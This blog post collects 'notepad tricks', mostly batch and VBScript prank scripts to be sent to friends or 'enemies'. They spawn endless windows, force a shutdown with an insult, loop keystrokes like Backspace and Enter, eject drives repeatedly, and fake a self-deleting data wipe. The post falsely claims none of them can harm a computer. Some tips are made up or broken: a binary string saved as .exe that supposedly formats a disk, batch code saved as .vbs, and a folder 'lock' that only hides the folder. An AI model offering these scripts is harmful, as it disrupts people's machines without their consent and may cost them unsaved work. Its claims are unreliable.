AMAZING AND COOL NOTEPAD TRICKS...every thing which will amaze you

now here are some amazing  cool notepad tricks which you will like the most:-

A NOTEPAD TRICK BY WHICH YOU CAN SCARE YOUR FRIENDS BY DELETING FILES.....

Description: This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable. 

1. Go into Notepad.
2. COPY the text below into notepad
 @echo off
echo do you want to delete all of your computer data? (y/n)
pause >nul
echo Do not exit out of the screen or all computer data will be deleted.
ping localhost -n 2 > nul
echo Are you sure you want to delete all computer data? (y/n)
pause >nul
echo deleting all data...
echo.
echo.
pause localhost -n 2 > nul
dir /s
echo.
echo.
ping localhost -n 2 > nul
cls
echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n)
pause
echo.
echo.
ping localhost -n 1 > nul
cls
dir /s
echo.
echo.
ping localhost -n 2 >nul
cls
echo all data has been deleted..
pause
del "c:delete.bat"


3. Save this as delete.bat (MUST NAME IT THIS!)
------------------------------------------------------------

 To make your  KEY BOARD BLINKING LIGHTS CONTINUOUSLY!!!!!

1. Open Notepad.
2. Copy paste the exact code given below:-



Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
3. Save the file as TRICKS.vbs .

DOUBLE CLICK THAT FILE AND HAVE FUN!!!!!!
--------------------------------------------------------------------------------

 A NOTEPAD TRICK WHICH YOU CAN USE FOR YOUR ENEMIES....@ NOTEPAD TRICK


Description: This prank will create and open a file that they cannot close, minimize, or maximize without closing the command prompt behind it.

1. Go into Notepad

2. Type the text below.

 @echo off
md hello
:A
start hello
goto A


3. Save it as file.bat
 ----------------------------------------------------------------------------------

 Lock a Folder Using Notepad....@ NOTEPAD TRICK

  • Consider you want to lock a folder named PICS in your D:\ , whose path is D:\PICS
  • Now open the Notepad and type the following
ren pics pics.{21EC2020-3AEA-1069-A2DD-08002B30309D}


  • Where pics is your folder name. Save the text file as lock.bat in the same drive.
  • Open another new notepad text file and type the following
ren pics.{21EC2020-3AEA-1069-A2DD-08002B30309D} pics


  • Save the text file as key.bat in the same drive.

Usage :


  • To lock the pics folder, simply click the lock.bat and it will transform into control panel icon which is inaccessible.
  • To unlock the folder click the key.bat file. Thus the folder will be unlocked and the contents are accessible.
-----------------------------------------------------------------------------------------------------------------------------
How to get fake error message???????@ NOTEPAD TRICKS
  • Open Notepad
  • Type in: msg * Error: Your system is affected by virus
  • Save as "virus.bat"
  • Now open that .bat file, now you got error message window
  • Its not virus, just your assumption message.
----------------------------------------------------------------------------------------------------------------------------
Matrix Notepad.....@ NOTEPAD TRICKS
  • Open notepad
  • Type @echo off 
  • Then type color 02 ,
  •  Then type-      :matrix (press enter) echo 10010002012020021021020120 (you can type any number but only number , echo then any number but not too long nor too short) 
  • Save this file as Matrix.bat
  • Make sure the file type is kept as ALL FILES while saving it as a .bat file.  
 ---------------------------------------------------------------------------------------------------------------------------
 Diary Entry (notepad works as a diary).....@ NOTEPAD TRICKS

  • Open notepad
  • Type .LOG
  • Save the file as LOG.txt
  • Write anything in it and it will be saved with the time when you edit it.  
 ------------------------------------------------------------------------------
 A NOTEPAD TRICK FOR Format Hard Disk with Notepad!!!!  HAVE FUN
 
  • Write The Following In Notepad Exactly as it says
Code : 01001011000111110010010101010101010000011111100000


  • Save As it as .EXE and any Name would Do.
  • Make an Ethical use of it. This .exe file can be really dangerous.
 -----------------------------------------------------------------------------
 HOW TO ACTIVATE GOD MODE IN WINDOWS 7 AND VISTA

If you are a user of Windows Vista or 7, and if you are not aware of GodMode this post is only for you. Godmode provides you with a shortcut icon where you can customize all your settings from mouse settings to display settings. This is very convenient as it provides all the options at one single place and activating godmode is also very simple and require only two simple steps.


Here are the steps to activate Godemode in 7 and Vista.

  1. Make a new folder.

  2. Rename it as GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

  3. You can change GodeMode to any other name if you wish.

  4. And that's it. A new icon will be appeared for the folder now.

  5. Double click on that and you will get GodMode

    ----------------------------------------------------------------------------

     NOTEPAD TRICK :: Show a error message and shut down friends computer

        Show a error message and shut down friends 
  6.  computer :
  7.  
  8.     Open Notepad and copy the following code.
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
  • Save it as abc.vbs
     NOW SEND TO ANYONE IF YOU WANT TO SCARE HIM/HER.These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe.
    ------------------------------------------------------------------ 
    ANOTHER NOTEPAD TRICK:::::: Hit Backspace Key Continuously :

    Hit Backspace Key Continuously :
    • Open Notepad and copy the following code.
    MsgBox "Let's go back a few steps"
    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop
    • Save it as abc.vbs
       NOW SEND TO ANYONE IF YOU WANT TO SCARE HIM/HER.These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe. 
      --------------------------------------------------------------

ANOTHER NOTEPAD TRICK:Type any message in notepad automatically and scare your friends :
Type any message in notepad automatically and scare your friends :
  • Open Notepad and type the following code.
 

WScript.Sleep 1800
WScript.Sleep 1000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
Now save it as abc.vbs
 NOW SEND TO ANYONE IF YOU WANT TO SCARE HIM/HER.These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe.
-----------------------------------------------------------------------
 ANOTHER NOTEPAD TRICK:::::: Hit Enter Key Continuously 

 Hit Enter Key Continuously :

  • Open Notepad and copy the following code.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
  • Save it as abc.vbs
     NOW SEND TO ANYONE IF YOU WANT TO SCARE HIM/HER.These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe.
    ------------------------------------------------------------------
     ANOTHER COOL NOTE PAD TRICK Hack keyboard to make it type anything continuously:

    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "HELLO SIR HOW ARE YOU."
    loop
    • You can change HELLO SIR HOW ARE YOU . to any other text
    • Save it as abc.vbs
       NOW SEND TO ANYONE IF YOU WANT TO SCARE HIM/HER.These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe.
      ----------------------------------------------------------------------          
    ANOTHER NOTEPAD TRICK FROM WHICH YOU CAN Toggle Caps Lock button On-Off Continuously :

    AS YOU HAVE SEEN ANOTHER NOTE PAD TRICKS IN OUR BLOG THIS ONE IS ALSO AN AMAZING TRICK!!!!
    FIRSTLY::::::::
    • Open Notepad.
    • Copy the following code.


    Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    loop
    . Save it as abc.vbs
     NOW SEND TO ANYONE IF YOU WANT TO SCARE HIM/HER.These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe.
     ---------------------------------------------------------------------
     NOTEPAD TRICK Continuously Pop out CD or DVD Drive!!!


    THIS A ANOTHER NOTEPAD TRICK WHICH YOU ALL WILL LIKE !!!!!

    FIRSTLY AS WE ALL KNOW
    • Open Notepad.
    • Copy the code bellow.
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop
     Now save as abc.vbs 
     NOW SEND TO ANYONE IF YOU WANT TO SCARE HIM/HER.These tricks will not harm your computer in anyway. After performing these tricks if you want to stop them simply restart your computer or else Open Task Manager ( Ctrl+Alt+Del) go to processes tab and end the process wscript.exe.

    --------------------------------------------------------------------
     CONVERT YOUR TEXT INTO AUDIO WITH NOTEPAD:-


     If you want to convert your text in to audio you have to use any programmes. But from this method you don't want to use another software.  An easy trick from Notepad.
    Let's start.
    • Open notepad.
    • Copy the code bellow.
    Dim msg, sapi
    msg=InputBox("Enter your text for Conversation")
    Set sapi=CreateObject("sapi.spvoice")
    sapi.Speak msg
    • Now save it as text_audio.vbs
    • And that's it.
    • Now open the file and type anything. Then click OK.
     don't forget to comment!!!!
    --------------------------------------------------------------------
    i hope you all like these collection note pad tricks......
Previous
Next Post »